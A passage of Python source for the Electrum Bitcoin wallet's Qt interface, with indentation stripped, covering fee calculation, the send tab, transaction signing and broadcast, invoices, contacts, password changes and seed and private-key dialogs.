# This is so that when the user blanks the fee and moves on,
# we go back to auto-calculate mode and put a fee back.
edit_changed.setModified(False)
else:
# edit_changed was edited just now, so make sure we will
# freeze the correct fee setting (this)
edit_other.setModified(False)
self.fee_slider.deactivate()
self.update_fee()
class TxSizeLabel(QLabel):
def setAmount(self, byte_size):
self.setText(('x %s bytes =' % byte_size) if byte_size else '')
self.size_e = TxSizeLabel()
self.size_e.setAlignment(Qt.AlignCenter)
self.size_e.setAmount(0)
self.size_e.setFixedWidth(140)
self.size_e.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
self.feerate_e = FeerateEdit(lambda: 0)
self.feerate_e.setAmount(self.config.fee_per_byte())
self.feerate_e.textEdited.connect(partial(on_fee_or_feerate, self.feerate_e, False))
self.feerate_e.editingFinished.connect(partial(on_fee_or_feerate, self.feerate_e, True))
self.fee_e = BTCAmountEdit(self.get_decimal_point)
self.fee_e.textEdited.connect(partial(on_fee_or_feerate, self.fee_e, False))
self.fee_e.editingFinished.connect(partial(on_fee_or_feerate, self.fee_e, True))
def feerounding_onclick():
text = (self.feerounding_text + '\n\n' +
_('To somewhat protect your privacy, Electrum tries to create change with similar precision to other outputs.') + ' ' +
_('At most 100 satoshis might be lost due to this rounding.') + ' ' +
_("You can disable this setting in '{}'.").format(_('Preferences')) + '\n' +
_('Also, dust is not kept as change, but added to the fee.') + '\n' +
_('Also, when batching RBF transactions, BIP 125 imposes a lower bound on the fee.'))
self.show_message(title=_('Fee rounding'), msg=text)
self.feerounding_icon = QPushButton(read_QIcon('info.png'), '')
self.feerounding_icon.setFixedWidth(20)
self.feerounding_icon.setFlat(True)
self.feerounding_icon.clicked.connect(feerounding_onclick)
self.feerounding_icon.setVisible(False)
self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e)
vbox_feelabel = QVBoxLayout()
vbox_feelabel.addWidget(self.fee_e_label)
vbox_feelabel.addStretch(1)
grid.addLayout(vbox_feelabel, 5, 0)
self.fee_adv_controls = QWidget()
hbox = QHBoxLayout(self.fee_adv_controls)
hbox.setContentsMargins(0, 0, 0, 0)
hbox.addWidget(self.feerate_e)
hbox.addWidget(self.size_e)
hbox.addWidget(self.fee_e)
hbox.addWidget(self.feerounding_icon, Qt.AlignLeft)
hbox.addStretch(1)
vbox_feecontrol = QVBoxLayout()
vbox_feecontrol.addWidget(self.fee_adv_controls)
vbox_feecontrol.addWidget(self.fee_slider)
grid.addLayout(vbox_feecontrol, 5, 1, 1, -1)
if not self.config.get('show_fee', False):
self.fee_adv_controls.setVisible(False)
self.preview_button = EnterButton(_("Preview"), self.do_preview)
self.preview_button.setToolTip(_('Display the details of your transaction before signing it.'))
self.send_button = EnterButton(_("Send"), self.do_send)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.preview_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 3)
self.amount_e.shortcut.connect(self.spend_max)
self.payto_e.textChanged.connect(self.update_fee)
self.amount_e.textEdited.connect(self.update_fee)
def reset_max(text):
self.max_button.setChecked(False)
enable = not bool(text) and not self.amount_e.isReadOnly()
self.max_button.setEnabled(enable)
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
def entry_changed():
text = ""
amt_color = ColorScheme.DEFAULT
fee_color = ColorScheme.DEFAULT
feerate_color = ColorScheme.DEFAULT
if self.not_enough_funds:
amt_color, fee_color = ColorScheme.RED, ColorScheme.RED
feerate_color = ColorScheme.RED
text = _("Not enough funds")
c, u, x = self.wallet.get_frozen_balance()
if c+u+x:
text += " ({} {} {})".format(
self.format_amount(c + u + x).strip(), self.base_unit(), _("are frozen")
)
# blue color denotes auto-filled values
elif self.fee_e.isModified():
feerate_color = ColorScheme.BLUE
elif self.feerate_e.isModified():
fee_color = ColorScheme.BLUE
elif self.amount_e.isModified():
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
else:
amt_color = ColorScheme.BLUE
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
self.statusBar().showMessage(text)
self.amount_e.setStyleSheet(amt_color.as_stylesheet())
self.fee_e.setStyleSheet(fee_color.as_stylesheet())
self.feerate_e.setStyleSheet(feerate_color.as_stylesheet())
self.amount_e.textChanged.connect(entry_changed)
self.fee_e.textChanged.connect(entry_changed)
self.feerate_e.textChanged.connect(entry_changed)
self.invoices_label = QLabel(_('Invoices'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
if run_hook('abort_send', self):
return
self.max_button.setChecked(True)
self.do_update_fee()
def update_fee(self):
self.require_fee_update = True
def get_payto_or_dummy(self):
r = self.payto_e.get_recipient()
if r:
return r
return (TYPE_ADDRESS, self.wallet.dummy_address())
def do_update_fee(self):
'''Recalculate the fee. If the fee was manually input, retain it, but
still build the TX to see if there are enough funds.
'''
freeze_fee = self.is_send_fee_frozen()
freeze_feerate = self.is_send_feerate_frozen()
amount = '!' if self.max_button.isChecked() else self.amount_e.get_amount()
if amount is None:
if not freeze_fee:
self.fee_e.setAmount(None)
self.not_enough_funds = False
self.statusBar().showMessage('')
return
outputs, fee_estimator, tx_desc, coins = self.read_send_tab()
if not outputs:
_type, addr = self.get_payto_or_dummy()
outputs = [TxOutput(_type, addr, amount)]
is_sweep = bool(self.tx_external_keypairs)
make_tx = lambda fee_est: \
self.wallet.make_unsigned_transaction(
coins, outputs, self.config,
fixed_fee=fee_est, is_sweep=is_sweep)
try:
tx = make_tx(fee_estimator)
self.not_enough_funds = False
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
if not freeze_fee:
self.fee_e.setAmount(None)
if not freeze_feerate:
self.feerate_e.setAmount(None)
self.feerounding_icon.setVisible(False)
if isinstance(e, NotEnoughFunds):
self.not_enough_funds = True
elif isinstance(e, NoDynamicFeeEstimates):
try:
tx = make_tx(0)
size = tx.estimated_size()
self.size_e.setAmount(size)
except BaseException:
pass
return
except BaseException:
self.logger.exception('')
return
size = tx.estimated_size()
self.size_e.setAmount(size)
fee = tx.get_fee()
fee = None if self.not_enough_funds else fee
# Displayed fee/fee_rate values are set according to user input.
# Due to rounding or dropping dust in CoinChooser,
# actual fees often differ somewhat.
if freeze_feerate or self.fee_slider.is_active():
displayed_feerate = self.feerate_e.get_amount()
if displayed_feerate is not None:
displayed_feerate = quantize_feerate(displayed_feerate)
else:
# fallback to actual fee
displayed_feerate = quantize_feerate(fee / size) if fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
displayed_fee = round(displayed_feerate * size) if displayed_feerate is not None else None
self.fee_e.setAmount(displayed_fee)
else:
if freeze_fee:
displayed_fee = self.fee_e.get_amount()
else:
# fallback to actual fee if nothing is frozen
displayed_fee = fee
self.fee_e.setAmount(displayed_fee)
displayed_fee = displayed_fee if displayed_fee else 0
displayed_feerate = quantize_feerate(displayed_fee / size) if displayed_fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
# show/hide fee rounding icon
feerounding = (fee - displayed_fee) if fee else 0
self.set_feerounding_text(int(feerounding))
self.feerounding_icon.setToolTip(self.feerounding_text)
self.feerounding_icon.setVisible(abs(feerounding) >= 1)
if self.max_button.isChecked():
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
self.amount_e.setAmount(amount_after_all_fees)
def from_list_delete(self, item):
i = self.from_list.indexOfTopLevelItem(item)
self.pay_from.pop(i)
self.redraw_from_list()
self.update_fee()
def from_list_menu(self, position):
item = self.from_list.itemAt(position)
menu = QMenu()
menu.addAction(_("Remove"), lambda: self.from_list_delete(item))
menu.exec_(self.from_list.viewport().mapToGlobal(position))
def set_pay_from(self, coins):
self.pay_from = list(coins)
self.redraw_from_list()
def redraw_from_list(self):
self.from_list.clear()
self.from_label.setHidden(len(self.pay_from) == 0)
self.from_list.setHidden(len(self.pay_from) == 0)
def format(x):
h = x.get('prevout_hash')
return h[0:10] + '...' + h[-10:] + ":%d"%x.get('prevout_n') + u'\t' + "%s"%x.get('address')
for item in self.pay_from:
self.from_list.addTopLevelItem(QTreeWidgetItem( [format(item), self.format_amount(item['value']) ]))
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_keystore_encryption():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
def is_send_fee_frozen(self):
return self.fee_e.isVisible() and self.fee_e.isModified() \
and (self.fee_e.text() or self.fee_e.hasFocus())
def is_send_feerate_frozen(self):
return self.feerate_e.isVisible() and self.feerate_e.isModified() \
and (self.feerate_e.text() or self.feerate_e.hasFocus())
def get_send_fee_estimator(self):
if self.is_send_fee_frozen():
fee_estimator = self.fee_e.get_amount()
elif self.is_send_feerate_frozen():
amount = self.feerate_e.get_amount() # sat/byte feerate
amount = 0 if amount is None else amount * 1000 # sat/kilobyte feerate
fee_estimator = partial(
simple_config.SimpleConfig.estimate_fee_for_feerate, amount)
else:
fee_estimator = None
return fee_estimator
def read_send_tab(self):
label = self.message_e.text()
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
outputs = self.payto_e.get_outputs(self.max_button.isChecked())
fee_estimator = self.get_send_fee_estimator()
coins = self.get_coins()
return outputs, fee_estimator, label, coins
def check_send_tab_outputs_and_show_errors(self, outputs) -> bool:
"""Returns whether there are errors with outputs.
Also shows error dialog to user if so.
"""
if self.payment_request and self.payment_request.has_expired():
self.show_error(_('Payment request has expired'))
return True
if not self.payment_request:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid Lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors]))
return True
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return True
if not outputs:
self.show_error(_('No outputs'))
return True
for o in outputs:
if o.address is None:
self.show_error(_('Bitcoin Address is None'))
return True
if o.type == TYPE_ADDRESS and not bitcoin.is_address(o.address):
self.show_error(_('Invalid Bitcoin Address'))
return True
if o.value is None:
self.show_error(_('Invalid Amount'))
return True
return False # no errors
def do_preview(self):
self.do_send(preview = True)
def do_send(self, preview = False):
if run_hook('abort_send', self):
return
outputs, fee_estimator, tx_desc, coins = self.read_send_tab()
if self.check_send_tab_outputs_and_show_errors(outputs):
return
try:
is_sweep = bool(self.tx_external_keypairs)
tx = self.wallet.make_unsigned_transaction(
coins, outputs, self.config, fixed_fee=fee_estimator,
is_sweep=is_sweep)
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
self.show_message(str(e))
return
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
except BaseException as e:
self.logger.exception('')
self.show_message(str(e))
return
amount = tx.output_value() if self.max_button.isChecked() else sum(map(lambda x:x[2], outputs))
fee = tx.get_fee()
use_rbf = self.config.get('use_rbf', True)
if use_rbf:
tx.set_rbf(True)
if fee < self.wallet.relayfee() * tx.estimated_size() / 1000:
self.show_error('\n'.join([
_("This transaction requires a higher fee, or it will not be propagated by your current server"),
_("Try to raise your transaction fee, or use a server with a lower relay fee.")
]))
return
if preview:
self.show_transaction(tx, tx_desc)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
return
# confirmation dialog
msg = [
_("Amount to be sent") + ": " + self.format_amount_and_units(amount),
_("Mining fee") + ": " + self.format_amount_and_units(fee),
]
x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) )
feerate_warning = simple_config.FEERATE_WARNING_HIGH_FEE
if fee > feerate_warning * tx.estimated_size() / 1000:
msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
if self.wallet.has_keystore_encryption():
msg.append("")
msg.append(_("Enter your password to proceed"))
password = self.password_dialog('\n'.join(msg))
if not password:
return
else:
msg.append(_('Proceed?'))
password = None
if not self.question('\n'.join(msg)):
return
def sign_done(success):
if success:
if not tx.is_complete():
self.show_transaction(tx)
self.do_clear()
else:
self.broadcast_transaction(tx, tx_desc)
self.sign_tx_with_password(tx, sign_done, password)
@protected
def sign_tx(self, tx, callback, password):
self.sign_tx_with_password(tx, callback, password)
def sign_tx_with_password(self, tx, callback, password):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
def on_success(result):
callback(True)
def on_failure(exc_info):
self.on_error(exc_info)
callback(False)
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
if self.tx_external_keypairs:
# can sign directly
task = partial(Transaction.sign, tx, self.tx_external_keypairs)
else:
task = partial(self.wallet.sign_transaction, tx, password)
msg = _('Signing transaction...')
WaitingDialog(self, msg, task, on_success, on_failure)
def broadcast_transaction(self, tx, tx_desc):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Payment request has expired")
status = False
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
msg = e.get_message_for_gui()
except BestEffortRequestFailed as e:
msg = repr(e)
else:
status, msg = True, tx.txid()
if pr and status is True:
self.invoices.set_paid(pr, tx.txid())
self.invoices.save()
self.payment_request = None
refund_address = self.wallet.get_receiving_address()
coro = pr.send_payment_and_receive_paymentack(str(tx), refund_address)
fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
ack_status, ack_msg = fut.result(timeout=20)
self.logger.info(f"Payment ACK: {ack_status}. Ack message: {ack_msg}")
return status, msg
# Capture current TL window; override might be removed on return
parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
def broadcast_done(result):
# GUI thread
if result:
status, msg = result
if status:
if tx_desc is not None and tx.is_complete():
self.wallet.set_label(tx.txid(), tx_desc)
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
self.do_clear()
else:
msg = msg or ''
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b):
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.message_e]:
e.setFrozen(True)
self.lock_amount(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoice(self, key):
self.invoices.remove(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
key = self.invoices.add(pr)
status = self.invoices.get_status(key)
self.invoice_list.update()
if status == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
self.show_message(self.payment_request.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request):
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(URI, self.on_pr)
except BaseException as e:
self.show_error(_('Invalid bitcoin URI:') + '\n' + str(e))
return
self.show_send_tab()
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.max_button.setChecked(False)
self.not_enough_funds = False
self.payment_request = None
self.payto_e.is_pr = False
for e in [self.payto_e, self.message_e, self.amount_e, self.fiat_send_e,
self.fee_e, self.feerate_e]:
e.setText('')
e.setFrozen(False)
self.fee_slider.activate()
self.feerate_e.setAmount(self.config.fee_per_byte())
self.size_e.setAmount(0)
self.feerounding_icon.setVisible(False)
self.set_pay_from([])
self.tx_external_keypairs = {}
self.update_status()
run_hook('do_clear', self)
def set_frozen_state_of_addresses(self, addrs, freeze: bool):
self.wallet.set_frozen_state_of_addresses(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
self.update_fee()
def set_frozen_state_of_coins(self, utxos, freeze: bool):
self.wallet.set_frozen_state_of_coins(utxos, freeze)
self.utxo_list.update()
self.update_fee()
def create_list_tab(self, l, toolbar=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.setSpacing(0)
if toolbar:
vbox.addLayout(toolbar)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
toolbar = l.create_toolbar(self.config)
toolbar_shown = self.config.get('show_toolbar_addresses', False)
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = l = UTXOList(self)
return self.create_list_tab(l)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if self.question(_("Do you want to remove {} from your wallet?").format(addr)):
self.wallet.delete_address(addr)
self.need_update.set() # history, addresses, coins
self.clear_receive_tab()
def get_coins(self):
if self.pay_from:
return self.pay_from
else:
return self.wallet.get_spendable_coins(None, self.config)
def spend_coins(self, coins):
self.set_pay_from(coins)
self.show_send_tab()
self.update_fee()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove {} from your list of contacts?")
.format(" + ".join(labels))):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_invoice(self, key):
pr = self.invoices.get(key)
if pr is None:
self.show_error('Cannot find payment request in wallet.')
return
pr.verify(self.contacts)
self.show_pr_details(pr)
def show_pr_details(self, pr):
key = pr.get_id()
d = WindowModalDialog(self, _("Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2])+ self.base_unit() + ' @ ' + x[1], pr.get_outputs()))
grid.addWidget(QLabel(outputs_str), 1, 1)
expires = pr.get_expiration_date()
grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
grid.addWidget(QLabel(pr.get_memo()), 2, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
if expires:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(expires)), 4, 1)
vbox.addLayout(grid)
def do_export():
name = str(key) + '.bip70'
fn = self.getSaveFileName(_("Save invoice to file"), name, filter="*.bip70")
if not fn:
return
with open(fn, 'wb') as f:
data = f.write(pr.raw)
self.show_message(_('Invoice saved as' + ' ' + fn))
exportButton = EnterButton(_('Save'), do_export)
def do_delete():
if self.question(_('Delete invoice?')):
self.invoices.remove(key)
self.history_list.update()
self.invoice_list.update()
d.close()
deleteButton = EnterButton(_('Delete'), do_delete)
vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d)))
d.exec_()
def do_pay_invoice(self, key):
pr = self.invoices.get(key)
self.payment_request = pr
self.prepare_for_payment_request()
pr.error = None # this forces verify() to re-run
if pr.verify(self.contacts):
self.payment_request_ok()
else:
self.payment_request_error()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.config.get("console-history",[])
console.history_index = len(console.history)
console.updateNamespace({
'wallet': self.wallet,
'network': self.network,
'plugins': self.gui_object.plugins,
'window': self,
'config': self.config,
'electrum': electrum,
'daemon': self.gui_object.daemon,
'util': util,
'bitcoin': bitcoin,
})
c = commands.Commands(self.config, self.wallet, self.network, lambda: self.console.set_json(True))
methods = {}
def mkfunc(f, method):
return lambda *args: f(method, args, self.password_dialog)
for m in dir(c):
if m[0]=='_' or m in ['network','wallet','config']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
self.balance_label = QLabel("Loading wallet...")
self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.update_check_button = QPushButton("")
self.update_check_button.setFlat(True)
self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor))
self.update_check_button.setIcon(read_QIcon("update.png"))
self.update_check_button.hide()
sb.addPermanentWidget(self.update_check_button)
self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"), lambda: self.gui_object.show_network_dialog(self))
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def update_lock_icon(self):
icon = read_QIcon("lock.png") if self.wallet.has_password() else read_QIcon("unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.may_have_password())
self.send_button.setVisible(not self.wallet.is_watching_only())
def change_password_dialog(self):
from electrum.storage import STO_EV_XPUB_PW
if self.wallet.get_available_storage_encryption_version() == STO_EV_XPUB_PW:
from .password_dialog import ChangePasswordDialogForHW
d = ChangePasswordDialogForHW(self, self.wallet)
ok, encrypt_file = d.run()
if not ok:
return
try:
hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
except UserCancelled:
return
except BaseException as e:
self.logger.exception('')
self.show_error(str(e))
return
old_password = hw_dev_pw if self.wallet.has_password() else None
new_password = hw_dev_pw if encrypt_file else None
else:
from .password_dialog import ChangePasswordDialogForSW
d = ChangePasswordDialogForSW(self, self.wallet)
ok, old_password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(old_password, new_password, encrypt_file)
except InvalidPassword as e:
self.show_error(str(e))
return
except BaseException:
self.logger.exception('Failed to update password')
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
tab = self.tabs.currentWidget()
#if hasattr(tab, 'searchable_list'):
# tab.searchable_list.toggle_toolbar()
#return
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(280)
line2 = QLineEdit()
line2.setFixedWidth(280)
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def show_master_public_keys(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(500, 100)
mpk_list = self.wallet.get_master_public_keys()
vbox = QVBoxLayout()
wallet_type = self.wallet.storage.get('wallet_type', '')
if self.wallet.is_watching_only():
wallet_type += ' [{}]'.format(_('watching-only'))
seed_available = _('True') if self.wallet.has_seed() else _('False')
keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()]
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0)
grid.addWidget(QLabel(str(seed_available)), 3, 1)
if len(keystore_types) <= 1:
grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0)
ks_type = str(keystore_types[0]) if keystore_types else _('No keystore')
grid.addWidget(QLabel(ks_type), 4, 1)
vbox.addLayout(grid)
if self.wallet.is_deterministic():
mpk_text = ShowQRTextEdit()
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
def show_mpk(index):
mpk_text.setText(mpk_list[index])
# only show the combobox in case multiple accounts are available
if len(mpk_list) > 1:
def label(key):
if isinstance(self.wallet, Multisig_Wallet):
return _("cosigner") + f' {key+1} ( keystore: {keystore_types[key]} )'
return ''
labels = [label(i) for i in range(len(mpk_list))]
on_click = lambda clayout: show_mpk(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
else:
vbox.addWidget(QLabel(_("Master Public Key")))
show_mpk(0)
vbox.addWidget(mpk_text)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
r = self.gui_object.daemon.delete_wallet(wallet_path)
self.close()
if r:
self.show_error(_("Wallet removed: {}").format(basename))
else:
self.show_error(_("Wallet file not found: {}").format(basename))
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(str(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk, redeem_script = self.wallet.export_private_key(address, password)
except Exception as e:
self.logger.exception('')
self.show_message(str(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
if redeem_script:
vbox.addWidget(QLabel(_("Redeem Script") + ':'))
rds_e = ShowQRTextEdit(text=redeem_script)
